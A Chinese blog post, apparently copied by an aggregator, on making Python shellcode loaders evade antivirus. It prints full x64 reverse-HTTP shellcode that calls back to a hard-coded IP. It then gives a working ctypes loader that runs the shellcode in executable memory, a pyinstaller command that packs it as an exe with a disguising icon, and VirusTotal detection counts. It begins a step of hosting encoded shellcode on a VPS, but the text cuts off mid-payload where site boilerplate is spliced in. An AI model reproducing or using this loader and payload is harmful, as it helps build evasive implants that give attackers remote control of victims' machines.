渗透测试笔记之Python免杀——两行代码实现免杀!VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)
Posted AA8j
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了渗透测试笔记之Python免杀——两行代码实现免杀!VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)相关的知识,希望对你有一定的参考价值。
1. shellcode Loader
1.1 生成shellcode
生成py类型的payload:
得到shellcode:
buf = "\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x75\\x72\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4f\\xff\\xff\\xff\\x5d\\x6a\\x00\\x49\\xbe\\x77\\x69\\x6e\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x49\\x89\\xe6\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x48\\x31\\xc9\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x4d\\x31\\xc9\\x41\\x50\\x41\\x50\\x41\\xba\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xeb\\x73\\x5a\\x48\\x89\\xc1\\x41\\xb8\\xb3\\x15\\x00\\x00\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x6a\\x03\\x41\\x51\\x41\\xba\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x59\\x5b\\x48\\x89\\xc1\\x48\\x31\\xd2\\x49\\x89\\xd8\\x4d\\x31\\xc9\\x52\\x68\\x00\\x02\\x40\\x84\\x52\\x52\\x41\\xba\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x48\\x83\\xc3\\x50\\x6a\\x0a\\x5f\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\xff\\xff\\xff\\xff\\x4d\\x31\\xc9\\x52\\x52\\x41\\xba\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x85\\x9d\\x01\\x00\\x00\\x48\\xff\\xcf\\x0f\\x84\\x8c\\x01\\x00\\x00\\xeb\\xd3\\xe9\\xe4\\x01\\x00\\x00\\xe8\\xa2\\xff\\xff\\xff\\x2f\\x4f\\x6c\\x69\\x39\\x00\\xea\\xf8\\x43\\x38\\x93\\xe8\\x36\\x73\\xce\\x2f\\x3b\\x08\\x6f\\xa9\\x7e\\x11\\xdc\\x18\\xf8\\x71\\x43\\xe2\\x0f\\x92\\xd7\\x3e\\xd6\\xac\\xfc\\xab\\x59\\x15\\xd9\\xdc\\x48\\x2c\\x76\\xc9\\x3c\\x19\\x77\\xbe\\x4f\\x57\\xbf\\xe0\\x17\\xfb\\x7b\\x1f\\x0f\\xd5\\xc3\\x89\\x12\\x37\\x8b\\xe7\\x37\\x80\\xd8\\x2c\\x96\\x7c\\xb8\\x08\\x0e\\xf1\\x37\\x48\\x15\\x9e\\xa8\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x37\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x35\\x2e\\x31\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x67\\x8d\\x04\\x19\\x98\\x95\\x99\\x3d\\x2f\\x9e\\x37\\xab\\x27\\x74\\x98\\xe8\\xc9\\x1e\\x06\\xce\\x89\\x67\\xcd\\x7d\\x63\\xb1\\x88\\x6f\\xdc\\xee\\x0f\\xf2\\x32\\xa0\\xf4\\x0e\\xf6\\xcf\\xc5\\x60\\x0c\\x1d\\xcb\\x29\\xfc\\xd7\\xc2\\xfa\\xba\\x59\\xdf\\x1a\\x04\\xd3\\xc5\\x20\\xcd\\xed\\x18\\x6e\\xe9\\xa1\\xe8\\xad\\xa7\\x7f\\xf2\\x97\\xab\\x8b\\x54\\x19\\xe3\\x85\\x19\\x80\\x33\\x88\\xf1\\x68\\x54\\x7a\\xcb\\x8b\\xf1\\x5e\\xf9\\x80\\x59\\xd1\\x4d\\x4e\\x41\\x0a\\xcc\\xe0\\x3b\\x5a\\xb4\\x50\\x30\\xbe\\xc0\\xa5\\xa3\\x74\\xbf\\x36\\xbb\\xc5\\xee\\x1c\\x1a\\x3c\\x25\\xb0\\x0e\\x78\\xa7\\xa9\\x6d\\x16\\xce\\x32\\x17\\x7b\\x9c\\x0d\\x44\\x5e\\x3e\\xc5\\x7d\\x7c\\xba\\xb0\\x83\\x34\\x31\\xcd\\xcc\\x11\\xf8\\x78\\x64\\x4d\\xe5\\x93\\x0d\\x7d\\xce\\xac\\x63\\x6f\\x06\\x42\\x0d\\x18\\xa2\\x5e\\x01\\xb3\\x87\\xcd\\x1d\\x8e\\xd4\\x0b\\x19\\xe8\\xd7\\xca\\x9f\\x83\\xaa\\xa8\\x4b\\x75\\x45\\x62\\x93\\x55\\xf2\\x2c\\xb7\\xe9\\x2f\\xd8\\x78\\x38\\x64\\x21\\xbd\\x5e\\xeb\\x11\\xd3\\x38\\xaa\\x1f\\x5c\\x34\\xd4\\x04\\x8c\\xec\\x18\\x44\\x5f\\x46\\x40\\x65\\x5b\\x67\\xec\\xd1\\x39\\x66\\x9d\\x89\\x9c\\x47\\xde\\x9e\\xe9\\x00\\x41\\xbe\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x48\\x31\\xc9\\xba\\x00\\x00\\x40\\x00\\x41\\xb8\\x00\\x10\\x00\\x00\\x41\\xb9\\x40\\x00\\x00\\x00\\x41\\xba\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x48\\x93\\x53\\x53\\x48\\x89\\xe7\\x48\\x89\\xf1\\x48\\x89\\xda\\x41\\xb8\\x00\\x20\\x00\\x00\\x49\\x89\\xf9\\x41\\xba\\x12\\x96\\x89\\xe2\\xff\\xd5\\x48\\x83\\xc4\\x20\\x85\\xc0\\x74\\xb6\\x66\\x8b\\x07\\x48\\x01\\xc3\\x85\\xc0\\x75\\xd7\\x58\\x58\\x58\\x48\\x05\\x00\\x00\\x00\\x00\\x50\\xc3\\xe8\\x9f\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x38\\x2e\\x34\\x38\\x00\\x19\\x69\\xa0\\x8d"
1.2 shellcode loader 脚本上线测试
将生成的payload复制到此加载器:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2021/10/24 15:32
# @Author : AA8j
# @Site :
# @File : Loader2.py
# @Software: PyCharm
# @Blog : https://blog.csdn.net/qq_44874645
import ctypes
shellcode = b"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x75\\x72\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4f\\xff\\xff\\xff\\x5d\\x6a\\x00\\x49\\xbe\\x77\\x69\\x6e\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x49\\x89\\xe6\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x48\\x31\\xc9\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x4d\\x31\\xc9\\x41\\x50\\x41\\x50\\x41\\xba\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xeb\\x73\\x5a\\x48\\x89\\xc1\\x41\\xb8\\xb3\\x15\\x00\\x00\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x6a\\x03\\x41\\x51\\x41\\xba\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x59\\x5b\\x48\\x89\\xc1\\x48\\x31\\xd2\\x49\\x89\\xd8\\x4d\\x31\\xc9\\x52\\x68\\x00\\x02\\x40\\x84\\x52\\x52\\x41\\xba\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x48\\x83\\xc3\\x50\\x6a\\x0a\\x5f\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\xff\\xff\\xff\\xff\\x4d\\x31\\xc9\\x52\\x52\\x41\\xba\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x85\\x9d\\x01\\x00\\x00\\x48\\xff\\xcf\\x0f\\x84\\x8c\\x01\\x00\\x00\\xeb\\xd3\\xe9\\xe4\\x01\\x00\\x00\\xe8\\xa2\\xff\\xff\\xff\\x2f\\x4f\\x6c\\x69\\x39\\x00\\xea\\xf8\\x43\\x38\\x93\\xe8\\x36\\x73\\xce\\x2f\\x3b\\x08\\x6f\\xa9\\x7e\\x11\\xdc\\x18\\xf8\\x71\\x43\\xe2\\x0f\\x92\\xd7\\x3e\\xd6\\xac\\xfc\\xab\\x59\\x15\\xd9\\xdc\\x48\\x2c\\x76\\xc9\\x3c\\x19\\x77\\xbe\\x4f\\x57\\xbf\\xe0\\x17\\xfb\\x7b\\x1f\\x0f\\xd5\\xc3\\x89\\x12\\x37\\x8b\\xe7\\x37\\x80\\xd8\\x2c\\x96\\x7c\\xb8\\x08\\x0e\\xf1\\x37\\x48\\x15\\x9e\\xa8\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x37\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x35\\x2e\\x31\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x67\\x8d\\x04\\x19\\x98\\x95\\x99\\x3d\\x2f\\x9e\\x37\\xab\\x27\\x74\\x98\\xe8\\xc9\\x1e\\x06\\xce\\x89\\x67\\xcd\\x7d\\x63\\xb1\\x88\\x6f\\xdc\\xee\\x0f\\xf2\\x32\\xa0\\xf4\\x0e\\xf6\\xcf\\xc5\\x60\\x0c\\x1d\\xcb\\x29\\xfc\\xd7\\xc2\\xfa\\xba\\x59\\xdf\\x1a\\x04\\xd3\\xc5\\x20\\xcd\\xed\\x18\\x6e\\xe9\\xa1\\xe8\\xad\\xa7\\x7f\\xf2\\x97\\xab\\x8b\\x54\\x19\\xe3\\x85\\x19\\x80\\x33\\x88\\xf1\\x68\\x54\\x7a\\xcb\\x8b\\xf1\\x5e\\xf9\\x80\\x59\\xd1\\x4d\\x4e\\x41\\x0a\\xcc\\xe0\\x3b\\x5a\\xb4\\x50\\x30\\xbe\\xc0\\xa5\\xa3\\x74\\xbf\\x36\\xbb\\xc5\\xee\\x1c\\x1a\\x3c\\x25\\xb0\\x0e\\x78\\xa7\\xa9\\x6d\\x16\\xce\\x32\\x17\\x7b\\x9c\\x0d\\x44\\x5e\\x3e\\xc5\\x7d\\x7c\\xba\\xb0\\x83\\x34\\x31\\xcd\\xcc\\x11\\xf8\\x78\\x64\\x4d\\xe5\\x93\\x0d\\x7d\\xce\\xac\\x63\\x6f\\x06\\x42\\x0d\\x18\\xa2\\x5e\\x01\\xb3\\x87\\xcd\\x1d\\x8e\\xd4\\x0b\\x19\\xe8\\xd7\\xca\\x9f\\x83\\xaa\\xa8\\x4b\\x75\\x45\\x62\\x93\\x55\\xf2\\x2c\\xb7\\xe9\\x2f\\xd8\\x78\\x38\\x64\\x21\\xbd\\x5e\\xeb\\x11\\xd3\\x38\\xaa\\x1f\\x5c\\x34\\xd4\\x04\\x8c\\xec\\x18\\x44\\x5f\\x46\\x40\\x65\\x5b\\x67\\xec\\xd1\\x39\\x66\\x9d\\x89\\x9c\\x47\\xde\\x9e\\xe9\\x00\\x41\\xbe\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x48\\x31\\xc9\\xba\\x00\\x00\\x40\\x00\\x41\\xb8\\x00\\x10\\x00\\x00\\x41\\xb9\\x40\\x00\\x00\\x00\\x41\\xba\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x48\\x93\\x53\\x53\\x48\\x89\\xe7\\x48\\x89\\xf1\\x48\\x89\\xda\\x41\\xb8\\x00\\x20\\x00\\x00\\x49\\x89\\xf9\\x41\\xba\\x12\\x96\\x89\\xe2\\xff\\xd5\\x48\\x83\\xc4\\x20\\x85\\xc0\\x74\\xb6\\x66\\x8b\\x07\\x48\\x01\\xc3\\x85\\xc0\\x75\\xd7\\x58\\x58\\x58\\x48\\x05\\x00\\x00\\x00\\x00\\x50\\xc3\\xe8\\x9f\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x38\\x2e\\x34\\x38\\x00\\x19\\x69\\xa0\\x8d"
# CS生成的ShellCode
shellcode = bytearray(shellcode)
"""
【设置返回类型】
我们需要用VirtualAlloc函数来申请内存,返回类型必须和系统位数相同
想在64位系统上运行,必须使用restype函数设置VirtualAlloc返回类型为ctypes.c_unit64,否则默认的是 32 位
"""
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
"""
【申请内存】
ctypes.c_int(0) :是NULL,系统将会决定分配内存区域的位置,并且按64KB向上取整
ctypes.c_int(len(shellcode)) :以字节为单位分配或者保留多大区域
ctypes.c_int(0x3000) :是 MEM_COMMIT(0x1000) 和 MEM_RESERVE(0x2000)类型的合并
ctypes.c_int(0x40) :是权限为PAGE_EXECUTE_READWRITE 该区域可以执行代码,应用程序可以读写该区域。
"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
ctypes.c_int(0x40))
"""
【放入shellcode】
从指定内存地址将内容复制到我们申请的内存中去,shellcode字节多大就复制多大
"""
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
"""
【创建一个线程从shellcode放置位置开始执行】
lpThreadAttributes :为NULL使用默认安全性
dwStackSize :为0,默认将使用与调用该函数的线程相同的栈空间大小
lpStartAddress :为ctypes.c_uint64(ptr),定位到申请的内存所在的位置
lpParameter :不需传递参数时为NULL
dwCreationFlags :属性为0,表示创建后立即激活
lpThreadId :为ctypes.pointer(ctypes.c_int(0))不想返回线程ID,设置值为NULL
"""
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
"""
【等待线程结束】
这里两个参数,一个是创建的线程,一个是等待时间
当线程退出时会给出一个信号,函数收到后会结束程序。
当时间设置为0或超过等待时间,程序也会结束,所以线程也会跟着结束。
正常的话我们创建的线程是需要一直运行的,所以将时间设为负数,等待时间将成为无限等待,程序就不会结束。
"""
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
靶机使用python运行,成功上线:
1.3 使用pyinstaller生成exe文件上线测试
使用pyinstaller生成exe文件:
pyinstaller -w -F Loader2.py -i 360.ico -n test.exe
pyinstaller参数说明:
-F,-onefile 产生单个的可执行文件
-D,--onedir 产生一个目录(包含多个文件)作为可执行程序
-a,--ascii 不包含 Unicode 字符集支持
-d,--debug 产生 debug 版本的可执行文件
-w,--windowed,--noconsolc 指定程序运行时不显示命令行窗口(仅对 Windows 有效)
-c,--nowindowed,--console 指定使用命令行窗口运行程序(仅对 Windows 有效)
-o DIR,--out=DIR 指定 spec 文件的生成目录。如果没有指定,则默认使用当前目录来生成 spec 文件
-p DIR,--path=DIR 设置 Python 导入模块的路径(和设置 PYTHONPATH 环境变量的作用相似)。也可使用路径分隔符(Windows 使用分号,Linux 使用冒号)来分隔多个路径
-n NAME,--name=NAME 指定项目(产生的 spec)名字。如果省略该选项,那么第一个脚本的主文件名将作为 spec 的名字
双击测试能否上线:
成功上线:
1.4 VT查杀率:24/68
360还是能轻松过的:
2. ShellCode 分离
2.1 上传加密后的shellcode
将ShellCode使用Base64加密存放到vps上可供访问:
shellcode(注意格式为b"shellcode"
):
b"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x75\\x72\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4f\\xff\\xff\\xff\\x5d\\x6a\\x00\\x49\\xbe\\x77\\x69\\x6e\\x69\\x6e\\x65\\x74\\x00\\x41\\x56\\x49\\x89\\xe6\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x48\\x31\\xc9\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x4d\\x31\\xc9\\x41\\x50\\x41\\x50\\x41\\xba\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xeb\\x73\\x5a\\x48\\x89\\xc1\\x41\\xb8\\xb3\\x15\\x00\\x00\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x6a\\x03\\x41\\x51\\x41\\xba\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x59\\x5b\\x48\\x89\\xc1\\x48\\x31\\xd2\\x49\\x89\\xd8\\x4d\\x31\\xc9\\x52\\x68\\x00\\x02\\x40\\x84\\x52\\x52\\x41\\xba\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x48\\x89\\xc6\\x48\\x83\\xc3\\x50\\x6a\\x0a\\x5f\\x48\\x89\\xf1\\x48\\x89\\xda\\x49\\xc7\\xc0\\xff\\xff\\xff\\xff\\x4d\\x31\\xc9\\x52\\x52\\x41\\xba\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x85\\x9d\\x01\\x00\\x00\\x48\\xff\\xcf\\x0f\\x84\\x8c\\x01\\x00\\x00\\xeb\\xd3\\xe9\\xe4\\x01\\x00\\x00\\xe8\\xa2\\xff\\xff\\xff\\x2f\\x4f\\x6c\\x69\\x39\\x00\\xea\\xf8\\x43\\x38\\x93\\xe8\\x36\\x73\\xce\\x2f\\x3b\\x08\\x6f\\xa9\\x7e\\x11\\xdc\\x18\\xf8\\x71\\x43\\xe2\\x0f\\x92\\xd7\\x3e\\xd6\\xac\\xfc\\xab\\x59\\x15\\xd9\\xdc\\x48\\x2c\\x76\\xc9\\x3c\\x19\\x77\\xbe\\x4f\\x57\\xbf\\xe0\\x17\\xfb\\x7b\\x1f\\x0f\\xd5\\xc3\\x89\\x12\\x37\\x8b\\xe7\\x37\\x80\\xd8\\x2c\\x96\\x7c\\xb8\\x08\\x0e\\xf1\\x37\\x48\\x15\\x9e\\xa8\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x37\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x35\\x2e\\x31\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x34\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x67\\x8d\\x04\\x19\\x98\\x95\\x99\\x3d\\x2f\\x9e\\x37\\xab\\x27\\x74\\x98\\xe8\\xc9\\x1e\\x06\\xce\\x89\\x67\\xcd\\x7d\\x63\\xb1\\x88\\x6f\\xdc\\xee以上是关于渗透测试笔记之Python免杀——两行代码实现免杀!VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)的主要内容,如果未能解决你的问题,请参考以下文章